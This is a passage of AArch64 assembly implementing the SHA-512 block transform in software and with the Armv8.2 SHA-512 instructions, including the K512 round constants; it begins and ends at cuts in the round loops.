eor x12,x12,x7,lsr#7 // sigma0(X[i+1])
add x25,x25,x16 // h+=Sigma1(e)
eor x28,x28,x27 // Maj(a,b,c)
eor x17,x13,x26,ror#39 // Sigma0(a)
eor x11,x11,x4,lsr#6 // sigma1(X[i+14])
add x6,x6,x15
add x21,x21,x25 // d+=h
add x25,x25,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x6,x6,x12
add x25,x25,x17 // h+=Sigma0(a)
add x6,x6,x11
ldr x11,[sp,#0]
str x14,[sp,#24]
ror x16,x21,#14
add x24,x24,x28 // h+=K[i]
ror x13,x8,#1
and x17,x22,x21
ror x12,x5,#19
bic x28,x23,x21
ror x14,x25,#28
add x24,x24,x6 // h+=X[i]
eor x16,x16,x21,ror#18
eor x13,x13,x8,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x25,x26 // a^b, b^c in next round
eor x16,x16,x21,ror#41 // Sigma1(e)
eor x14,x14,x25,ror#34
add x24,x24,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x12,x12,x5,ror#61
eor x13,x13,x8,lsr#7 // sigma0(X[i+1])
add x24,x24,x16 // h+=Sigma1(e)
eor x19,x19,x26 // Maj(a,b,c)
eor x17,x14,x25,ror#39 // Sigma0(a)
eor x12,x12,x5,lsr#6 // sigma1(X[i+14])
add x7,x7,x0
add x20,x20,x24 // d+=h
add x24,x24,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x7,x7,x13
add x24,x24,x17 // h+=Sigma0(a)
add x7,x7,x12
ldr x12,[sp,#8]
str x15,[sp,#0]
ror x16,x20,#14
add x23,x23,x19 // h+=K[i]
ror x14,x9,#1
and x17,x21,x20
ror x13,x6,#19
bic x19,x22,x20
ror x15,x24,#28
add x23,x23,x7 // h+=X[i]
eor x16,x16,x20,ror#18
eor x14,x14,x9,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x24,x25 // a^b, b^c in next round
eor x16,x16,x20,ror#41 // Sigma1(e)
eor x15,x15,x24,ror#34
add x23,x23,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x13,x13,x6,ror#61
eor x14,x14,x9,lsr#7 // sigma0(X[i+1])
add x23,x23,x16 // h+=Sigma1(e)
eor x28,x28,x25 // Maj(a,b,c)
eor x17,x15,x24,ror#39 // Sigma0(a)
eor x13,x13,x6,lsr#6 // sigma1(X[i+14])
add x8,x8,x1
add x27,x27,x23 // d+=h
add x23,x23,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x8,x8,x14
add x23,x23,x17 // h+=Sigma0(a)
add x8,x8,x13
ldr x13,[sp,#16]
str x0,[sp,#8]
ror x16,x27,#14
add x22,x22,x28 // h+=K[i]
ror x15,x10,#1
and x17,x20,x27
ror x14,x7,#19
bic x28,x21,x27
ror x0,x23,#28
add x22,x22,x8 // h+=X[i]
eor x16,x16,x27,ror#18
eor x15,x15,x10,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x23,x24 // a^b, b^c in next round
eor x16,x16,x27,ror#41 // Sigma1(e)
eor x0,x0,x23,ror#34
add x22,x22,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x14,x14,x7,ror#61
eor x15,x15,x10,lsr#7 // sigma0(X[i+1])
add x22,x22,x16 // h+=Sigma1(e)
eor x19,x19,x24 // Maj(a,b,c)
eor x17,x0,x23,ror#39 // Sigma0(a)
eor x14,x14,x7,lsr#6 // sigma1(X[i+14])
add x9,x9,x2
add x26,x26,x22 // d+=h
add x22,x22,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x9,x9,x15
add x22,x22,x17 // h+=Sigma0(a)
add x9,x9,x14
ldr x14,[sp,#24]
str x1,[sp,#16]
ror x16,x26,#14
add x21,x21,x19 // h+=K[i]
ror x0,x11,#1
and x17,x27,x26
ror x15,x8,#19
bic x19,x20,x26
ror x1,x22,#28
add x21,x21,x9 // h+=X[i]
eor x16,x16,x26,ror#18
eor x0,x0,x11,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x22,x23 // a^b, b^c in next round
eor x16,x16,x26,ror#41 // Sigma1(e)
eor x1,x1,x22,ror#34
add x21,x21,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x15,x15,x8,ror#61
eor x0,x0,x11,lsr#7 // sigma0(X[i+1])
add x21,x21,x16 // h+=Sigma1(e)
eor x28,x28,x23 // Maj(a,b,c)
eor x17,x1,x22,ror#39 // Sigma0(a)
eor x15,x15,x8,lsr#6 // sigma1(X[i+14])
add x10,x10,x3
add x25,x25,x21 // d+=h
add x21,x21,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x10,x10,x0
add x21,x21,x17 // h+=Sigma0(a)
add x10,x10,x15
ldr x15,[sp,#0]
str x2,[sp,#24]
ror x16,x25,#14
add x20,x20,x28 // h+=K[i]
ror x1,x12,#1
and x17,x26,x25
ror x0,x9,#19
bic x28,x27,x25
ror x2,x21,#28
add x20,x20,x10 // h+=X[i]
eor x16,x16,x25,ror#18
eor x1,x1,x12,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x21,x22 // a^b, b^c in next round
eor x16,x16,x25,ror#41 // Sigma1(e)
eor x2,x2,x21,ror#34
add x20,x20,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x0,x0,x9,ror#61
eor x1,x1,x12,lsr#7 // sigma0(X[i+1])
add x20,x20,x16 // h+=Sigma1(e)
eor x19,x19,x22 // Maj(a,b,c)
eor x17,x2,x21,ror#39 // Sigma0(a)
eor x0,x0,x9,lsr#6 // sigma1(X[i+14])
add x11,x11,x4
add x24,x24,x20 // d+=h
add x20,x20,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x11,x11,x1
add x20,x20,x17 // h+=Sigma0(a)
add x11,x11,x0
ldr x0,[sp,#8]
str x3,[sp,#0]
ror x16,x24,#14
add x27,x27,x19 // h+=K[i]
ror x2,x13,#1
and x17,x25,x24
ror x1,x10,#19
bic x19,x26,x24
ror x3,x20,#28
add x27,x27,x11 // h+=X[i]
eor x16,x16,x24,ror#18
eor x2,x2,x13,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x20,x21 // a^b, b^c in next round
eor x16,x16,x24,ror#41 // Sigma1(e)
eor x3,x3,x20,ror#34
add x27,x27,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x1,x1,x10,ror#61
eor x2,x2,x13,lsr#7 // sigma0(X[i+1])
add x27,x27,x16 // h+=Sigma1(e)
eor x28,x28,x21 // Maj(a,b,c)
eor x17,x3,x20,ror#39 // Sigma0(a)
eor x1,x1,x10,lsr#6 // sigma1(X[i+14])
add x12,x12,x5
add x23,x23,x27 // d+=h
add x27,x27,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x12,x12,x2
add x27,x27,x17 // h+=Sigma0(a)
add x12,x12,x1
ldr x1,[sp,#16]
str x4,[sp,#8]
ror x16,x23,#14
add x26,x26,x28 // h+=K[i]
ror x3,x14,#1
and x17,x24,x23
ror x2,x11,#19
bic x28,x25,x23
ror x4,x27,#28
add x26,x26,x12 // h+=X[i]
eor x16,x16,x23,ror#18
eor x3,x3,x14,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x27,x20 // a^b, b^c in next round
eor x16,x16,x23,ror#41 // Sigma1(e)
eor x4,x4,x27,ror#34
add x26,x26,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x2,x2,x11,ror#61
eor x3,x3,x14,lsr#7 // sigma0(X[i+1])
add x26,x26,x16 // h+=Sigma1(e)
eor x19,x19,x20 // Maj(a,b,c)
eor x17,x4,x27,ror#39 // Sigma0(a)
eor x2,x2,x11,lsr#6 // sigma1(X[i+14])
add x13,x13,x6
add x22,x22,x26 // d+=h
add x26,x26,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x13,x13,x3
add x26,x26,x17 // h+=Sigma0(a)
add x13,x13,x2
ldr x2,[sp,#24]
str x5,[sp,#16]
ror x16,x22,#14
add x25,x25,x19 // h+=K[i]
ror x4,x15,#1
and x17,x23,x22
ror x3,x12,#19
bic x19,x24,x22
ror x5,x26,#28
add x25,x25,x13 // h+=X[i]
eor x16,x16,x22,ror#18
eor x4,x4,x15,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x26,x27 // a^b, b^c in next round
eor x16,x16,x22,ror#41 // Sigma1(e)
eor x5,x5,x26,ror#34
add x25,x25,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x3,x3,x12,ror#61
eor x4,x4,x15,lsr#7 // sigma0(X[i+1])
add x25,x25,x16 // h+=Sigma1(e)
eor x28,x28,x27 // Maj(a,b,c)
eor x17,x5,x26,ror#39 // Sigma0(a)
eor x3,x3,x12,lsr#6 // sigma1(X[i+14])
add x14,x14,x7
add x21,x21,x25 // d+=h
add x25,x25,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x14,x14,x4
add x25,x25,x17 // h+=Sigma0(a)
add x14,x14,x3
ldr x3,[sp,#0]
str x6,[sp,#24]
ror x16,x21,#14
add x24,x24,x28 // h+=K[i]
ror x5,x0,#1
and x17,x22,x21
ror x4,x13,#19
bic x28,x23,x21
ror x6,x25,#28
add x24,x24,x14 // h+=X[i]
eor x16,x16,x21,ror#18
eor x5,x5,x0,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x25,x26 // a^b, b^c in next round
eor x16,x16,x21,ror#41 // Sigma1(e)
eor x6,x6,x25,ror#34
add x24,x24,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x4,x4,x13,ror#61
eor x5,x5,x0,lsr#7 // sigma0(X[i+1])
add x24,x24,x16 // h+=Sigma1(e)
eor x19,x19,x26 // Maj(a,b,c)
eor x17,x6,x25,ror#39 // Sigma0(a)
eor x4,x4,x13,lsr#6 // sigma1(X[i+14])
add x15,x15,x8
add x20,x20,x24 // d+=h
add x24,x24,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x15,x15,x5
add x24,x24,x17 // h+=Sigma0(a)
add x15,x15,x4
ldr x4,[sp,#8]
str x7,[sp,#0]
ror x16,x20,#14
add x23,x23,x19 // h+=K[i]
ror x6,x1,#1
and x17,x21,x20
ror x5,x14,#19
bic x19,x22,x20
ror x7,x24,#28
add x23,x23,x15 // h+=X[i]
eor x16,x16,x20,ror#18
eor x6,x6,x1,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x24,x25 // a^b, b^c in next round
eor x16,x16,x20,ror#41 // Sigma1(e)
eor x7,x7,x24,ror#34
add x23,x23,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x5,x5,x14,ror#61
eor x6,x6,x1,lsr#7 // sigma0(X[i+1])
add x23,x23,x16 // h+=Sigma1(e)
eor x28,x28,x25 // Maj(a,b,c)
eor x17,x7,x24,ror#39 // Sigma0(a)
eor x5,x5,x14,lsr#6 // sigma1(X[i+14])
add x0,x0,x9
add x27,x27,x23 // d+=h
add x23,x23,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x0,x0,x6
add x23,x23,x17 // h+=Sigma0(a)
add x0,x0,x5
ldr x5,[sp,#16]
str x8,[sp,#8]
ror x16,x27,#14
add x22,x22,x28 // h+=K[i]
ror x7,x2,#1
and x17,x20,x27
ror x6,x15,#19
bic x28,x21,x27
ror x8,x23,#28
add x22,x22,x0 // h+=X[i]
eor x16,x16,x27,ror#18
eor x7,x7,x2,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x23,x24 // a^b, b^c in next round
eor x16,x16,x27,ror#41 // Sigma1(e)
eor x8,x8,x23,ror#34
add x22,x22,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x6,x6,x15,ror#61
eor x7,x7,x2,lsr#7 // sigma0(X[i+1])
add x22,x22,x16 // h+=Sigma1(e)
eor x19,x19,x24 // Maj(a,b,c)
eor x17,x8,x23,ror#39 // Sigma0(a)
eor x6,x6,x15,lsr#6 // sigma1(X[i+14])
add x1,x1,x10
add x26,x26,x22 // d+=h
add x22,x22,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x1,x1,x7
add x22,x22,x17 // h+=Sigma0(a)
add x1,x1,x6
ldr x6,[sp,#24]
str x9,[sp,#16]
ror x16,x26,#14
add x21,x21,x19 // h+=K[i]
ror x8,x3,#1
and x17,x27,x26
ror x7,x0,#19
bic x19,x20,x26
ror x9,x22,#28
add x21,x21,x1 // h+=X[i]
eor x16,x16,x26,ror#18
eor x8,x8,x3,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x22,x23 // a^b, b^c in next round
eor x16,x16,x26,ror#41 // Sigma1(e)
eor x9,x9,x22,ror#34
add x21,x21,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x7,x7,x0,ror#61
eor x8,x8,x3,lsr#7 // sigma0(X[i+1])
add x21,x21,x16 // h+=Sigma1(e)
eor x28,x28,x23 // Maj(a,b,c)
eor x17,x9,x22,ror#39 // Sigma0(a)
eor x7,x7,x0,lsr#6 // sigma1(X[i+14])
add x2,x2,x11
add x25,x25,x21 // d+=h
add x21,x21,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x2,x2,x8
add x21,x21,x17 // h+=Sigma0(a)
add x2,x2,x7
ldr x7,[sp,#0]
str x10,[sp,#24]
ror x16,x25,#14
add x20,x20,x28 // h+=K[i]
ror x9,x4,#1
and x17,x26,x25
ror x8,x1,#19
bic x28,x27,x25
ror x10,x21,#28
add x20,x20,x2 // h+=X[i]
eor x16,x16,x25,ror#18
eor x9,x9,x4,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x21,x22 // a^b, b^c in next round
eor x16,x16,x25,ror#41 // Sigma1(e)
eor x10,x10,x21,ror#34
add x20,x20,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x8,x8,x1,ror#61
eor x9,x9,x4,lsr#7 // sigma0(X[i+1])
add x20,x20,x16 // h+=Sigma1(e)
eor x19,x19,x22 // Maj(a,b,c)
eor x17,x10,x21,ror#39 // Sigma0(a)
eor x8,x8,x1,lsr#6 // sigma1(X[i+14])
add x3,x3,x12
add x24,x24,x20 // d+=h
add x20,x20,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x3,x3,x9
add x20,x20,x17 // h+=Sigma0(a)
add x3,x3,x8
cbnz x19,Loop_16_xx
ldp x0,x2,[x29,#96]
ldr x1,[x29,#112]
sub x30,x30,#648 // rewind K512 pointer: 80 round constants plus terminator, 81*8 bytes
ldp x3,x4,[x0]
ldp x5,x6,[x0,#2*8]
add x1,x1,#14*8 // advance input pointer
ldp x7,x8,[x0,#4*8]
add x20,x20,x3
ldp x9,x10,[x0,#6*8]
add x21,x21,x4
add x22,x22,x5
add x23,x23,x6
stp x20,x21,[x0]
add x24,x24,x7
add x25,x25,x8
stp x22,x23,[x0,#2*8]
add x26,x26,x9
add x27,x27,x10
cmp x1,x2
stp x24,x25,[x0,#4*8]
stp x26,x27,[x0,#6*8]
b.ne Loop
ldp x19,x20,[x29,#16]
add sp,sp,#4*8
ldp x21,x22,[x29,#32]
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
ldp x29,x30,[sp],#128
AARCH64_VALIDATE_LINK_REGISTER
ret
.section __TEXT,__const
.align 6
LK512:
.quad 0x428a2f98d728ae22,0x7137449123ef65cd
.quad 0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
.quad 0x3956c25bf348b538,0x59f111f1b605d019
.quad 0x923f82a4af194f9b,0xab1c5ed5da6d8118
.quad 0xd807aa98a3030242,0x12835b0145706fbe
.quad 0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
.quad 0x72be5d74f27b896f,0x80deb1fe3b1696b1
.quad 0x9bdc06a725c71235,0xc19bf174cf692694
.quad 0xe49b69c19ef14ad2,0xefbe4786384f25e3
.quad 0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
.quad 0x2de92c6f592b0275,0x4a7484aa6ea6e483
.quad 0x5cb0a9dcbd41fbd4,0x76f988da831153b5
.quad 0x983e5152ee66dfab,0xa831c66d2db43210
.quad 0xb00327c898fb213f,0xbf597fc7beef0ee4
.quad 0xc6e00bf33da88fc2,0xd5a79147930aa725
.quad 0x06ca6351e003826f,0x142929670a0e6e70
.quad 0x27b70a8546d22ffc,0x2e1b21385c26c926
.quad 0x4d2c6dfc5ac42aed,0x53380d139d95b3df
.quad 0x650a73548baf63de,0x766a0abb3c77b2a8
.quad 0x81c2c92e47edaee6,0x92722c851482353b
.quad 0xa2bfe8a14cf10364,0xa81a664bbc423001
.quad 0xc24b8b70d0f89791,0xc76c51a30654be30
.quad 0xd192e819d6ef5218,0xd69906245565a910
.quad 0xf40e35855771202a,0x106aa07032bbd1b8
.quad 0x19a4c116b8d2d0c8,0x1e376c085141ab53
.quad 0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
.quad 0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
.quad 0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
.quad 0x748f82ee5defb2fc,0x78a5636f43172f60
.quad 0x84c87814a1f0ab72,0x8cc702081a6439ec
.quad 0x90befffa23631e28,0xa4506cebde82bde9
.quad 0xbef9a3f7b2c67915,0xc67178f2e372532b
.quad 0xca273eceea26619c,0xd186b8c721c0c207
.quad 0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
.quad 0x06f067aa72176fba,0x0a637dc5a2c898a6
.quad 0x113f9804bef90dae,0x1b710b35131c471b
.quad 0x28db77f523047d84,0x32caab7b40c72493
.quad 0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
.quad 0x4cc5d4becb3e42b6,0x597f299cfc657e2a
.quad 0x5fcb6fab3ad6faec,0x6c44198c4a475817
.quad 0 // terminator
.byte 83,72,65,53,49,50,32,98,108,111,99,107,32,116,114,97,110,115,102,111,114,109,32,102,111,114,32,65,82,77,118,56,44,32,67,82,89,80,84,79,71,65,77,83,32,98,121,32,60,97,112,112,114,111,64,111,112,101,110,115,115,108,46,111,114,103,62,0
.align 2
.align 2
.text
#ifndef __KERNEL__
.globl _sha512_block_data_order_hw
.private_extern _sha512_block_data_order_hw
.align 6
_sha512_block_data_order_hw:
// Armv8.3-A PAuth: even though x30 is pushed to the stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
ld1 {v16.16b,v17.16b,v18.16b,v19.16b},[x1],#64 // load input
ld1 {v20.16b,v21.16b,v22.16b,v23.16b},[x1],#64
ld1 {v0.2d,v1.2d,v2.2d,v3.2d},[x0] // load context
adrp x3,LK512@PAGE
add x3,x3,LK512@PAGEOFF
rev64 v16.16b,v16.16b
rev64 v17.16b,v17.16b
rev64 v18.16b,v18.16b
rev64 v19.16b,v19.16b
rev64 v20.16b,v20.16b
rev64 v21.16b,v21.16b
rev64 v22.16b,v22.16b
rev64 v23.16b,v23.16b
b Loop_hw
.align 4
Loop_hw:
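// The rounds below use the Armv8.2 SHA-512 instructions (sha512su0,
// sha512su1, sha512h, sha512h2). They are emitted as raw .long words
// so the file assembles even with toolchains that lack the mnemonics;
// each .long carries the intended instruction in its comment.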
ld1 {v24.2d},[x3],#16
subs x2,x2,#1
sub x4,x1,#128
orr v26.16b,v0.16b,v0.16b // offload
orr v27.16b,v1.16b,v1.16b
orr v28.16b,v2.16b,v2.16b
orr v29.16b,v3.16b,v3.16b
csel x1,x1,x4,ne // conditional rewind
add v24.2d,v24.2d,v16.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08230 //sha512su0 v16.16b,v17.16b
ext v7.16b,v20.16b,v21.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678af0 //sha512su1 v16.16b,v23.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v25.2d,v25.2d,v17.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08251 //sha512su0 v17.16b,v18.16b
ext v7.16b,v21.16b,v22.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678a11 //sha512su1 v17.16b,v16.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v24.2d,v24.2d,v18.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08272 //sha512su0 v18.16b,v19.16b
ext v7.16b,v22.16b,v23.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678a32 //sha512su1 v18.16b,v17.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v25.2d,v25.2d,v19.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08293 //sha512su0 v19.16b,v20.16b
ext v7.16b,v23.16b,v16.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678a53 //sha512su1 v19.16b,v18.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v24.2d,v24.2d,v20.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082b4 //sha512su0 v20.16b,v21.16b
ext v7.16b,v16.16b,v17.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678a74 //sha512su1 v20.16b,v19.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v25.2d,v25.2d,v21.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec082d5 //sha512su0 v21.16b,v22.16b
ext v7.16b,v17.16b,v18.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678a95 //sha512su1 v21.16b,v20.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v24.2d,v24.2d,v22.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082f6 //sha512su0 v22.16b,v23.16b
ext v7.16b,v18.16b,v19.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678ab6 //sha512su1 v22.16b,v21.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v25.2d,v25.2d,v23.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08217 //sha512su0 v23.16b,v16.16b
ext v7.16b,v19.16b,v20.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678ad7 //sha512su1 v23.16b,v22.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v24.2d,v24.2d,v16.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08230 //sha512su0 v16.16b,v17.16b
ext v7.16b,v20.16b,v21.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678af0 //sha512su1 v16.16b,v23.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v25.2d,v25.2d,v17.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08251 //sha512su0 v17.16b,v18.16b
ext v7.16b,v21.16b,v22.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678a11 //sha512su1 v17.16b,v16.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v24.2d,v24.2d,v18.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08272 //sha512su0 v18.16b,v19.16b
ext v7.16b,v22.16b,v23.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678a32 //sha512su1 v18.16b,v17.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v25.2d,v25.2d,v19.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08293 //sha512su0 v19.16b,v20.16b
ext v7.16b,v23.16b,v16.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678a53 //sha512su1 v19.16b,v18.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v24.2d,v24.2d,v20.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082b4 //sha512su0 v20.16b,v21.16b
ext v7.16b,v16.16b,v17.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678a74 //sha512su1 v20.16b,v19.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v25.2d,v25.2d,v21.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec082d5 //sha512su0 v21.16b,v22.16b
ext v7.16b,v17.16b,v18.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678a95 //sha512su1 v21.16b,v20.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v24.2d,v24.2d,v22.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082f6 //sha512su0 v22.16b,v23.16b
ext v7.16b,v18.16b,v19.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678ab6 //sha512su1 v22.16b,v21.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
